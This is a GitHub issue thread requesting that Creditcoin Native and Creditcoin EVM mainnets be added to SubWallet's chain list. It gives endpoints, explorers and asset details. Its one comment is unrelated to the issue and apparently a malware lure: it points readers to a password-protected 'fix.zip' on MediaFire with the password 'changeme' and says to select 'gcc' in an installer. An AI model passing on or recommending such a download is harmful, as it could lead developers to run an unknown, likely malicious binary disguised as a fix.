### ISSUE TITLE
[Creditcoin] Add support for Creditcoin CC3 Mainnet

### ISSUE THREAD

**Issue by Mabel-Nguyen** [Koniverse/SubWallet-ChainList#296]
**Integrate Creditcoin Native**
- Name of the blockchain: Creditcoin Native
- Type of the blockchain: Substrate
- Blockchain providers: wss://mainnet3.creditcoin.network
- Metadata of the blockchain: https://docs.creditcoin.org/smart-contract-guides/creditcoin-endpoints#testnet
- Logo of the blockchain: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=1545-15&t=Odn4UZkPRvNXvHwO-4
- Block explorers: https://creditcoin.subscan.io/
- Name of the asset: CTC (Creditcoin)
- Coingecko: https://www.coingecko.com/en/coins/creditcoin

**Integrate Creditcoin EVM**
- Name of the blockchain: Creditcoin EVM
- Type of the blockchain: EVM
- Blockchain providers: https://mainnet3.creditcoin.network/
- Metadata of the blockchain:
    https://github.com/ethereum-lists/chains/pull/5726/commits/19829aea8d2c1b9766c99f2c8fda0796b37bb839
- Logo of the blockchain: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=1545-15&t=Odn4UZkPRvNXvHwO-4
- Block explorers:
    https://creditcoin.blockscout.com/
- Name of the asset: CTC (Creditcoin EVM)
- Coingecko: https://www.coingecko.com/en/coins/creditcoin

**Other documents**
https://docs.creditcoin.org/environments/mainnet#connecting-to-testnet
https://creditcoin.org/blog/creditcoin-mainnet/#what-current-creditcoin-network-users-need-to-know-and-do

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
